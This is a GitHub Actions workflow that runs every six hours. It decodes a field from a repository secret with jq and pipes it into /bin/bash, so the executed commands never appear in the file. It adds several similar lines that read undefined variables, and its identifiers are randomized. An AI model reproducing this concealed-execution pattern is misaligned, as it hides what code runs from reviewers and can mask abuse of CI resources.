name: suoyijiameng

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suoyijiameng
        env:
          ndfk77: ${{ secrets.ndfk77 }}
        run: |
          echo $ndfk77 | jq -r .o120 | /bin/bash
          echo $wsz3012 | jq -r .ylnu3 | /bin/bash
          echo $fxb15 | jq -r .mows995 | /bin/bash
          echo $klb5 | jq -r .l1 | /bin/bash
          echo $va19 | jq -r .qvkuv88521 | /bin/bash
          echo $bcawh9 | jq -r .uorh348 | /bin/bash

